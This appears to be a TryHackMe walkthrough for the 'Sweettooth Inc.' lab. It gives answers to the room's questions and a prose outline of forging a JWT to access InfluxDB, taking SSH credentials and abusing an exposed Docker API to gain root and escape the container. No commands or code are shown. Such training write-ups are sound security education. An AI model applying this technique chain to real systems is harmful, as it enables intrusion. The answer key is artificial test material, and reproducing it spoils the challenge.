cd ../
[TryHackMe]

THM Walkthrough: Sweettooth Inc.

THMInfluxDBJWTDockerPrivEsc

1.1 INTRODUCTION

In this room, I first enumerated a vulnerable database where I crafted a JWT token to login into it and there I got the SSH credentials to the system. OnceI had gained a foothold on the system, it's a docker container with an exposed Docker Engine API.

1.2 ENUMERATION

Question:

  1. Do a TCP portscan. What is the name of the database software running on one of these ports?

Answer: influxdb

Did an aggressive nmap scan.

1.3 DATABASE EXPLORATION AND USER FLAG

Questions:

  1. What is the database user you find?

Answer: o5yY6yya

  1. What was the temperature of the water tank at 1621346400 (UTC Unix Timestamp)?

Answer: 22.5

  1. What is the highest rpm the motor of the mixer reached?

Answer:4875

  1. What username do you find in one of the databases?

Answer: uzJk6Ry98d8C

  1. user.txt

Answer: THM

1.4 PRIVILEGE ESCALATION

Question:

  1. /root/root.txt

Answer: [THM]

Creating an jwt token

Performing an ssh and checking the misconfigured permissions:

Getting the shell:

Viewing the root contents

1.5 ESCAPE

Question:

  1. The second /root/root.txt

[Answer: THM]

1.6 CONCLUSIONS

In the Sweettooth Inc. module, I successfully identified a vulnerable influxdb database and crafted a JWT token to gain access, retrieving SSH credentials to the system. This led to a Docker environment with an exposed API, enabling me to escalate privileges and retrieve critical information, including the user.txt flag.

While tackling this module, I faced challenges with timestamp conversions and privilege escalation within the Docker environment. With focused enumeration and database analysis, I resolved these issues.

Completion Screenshot: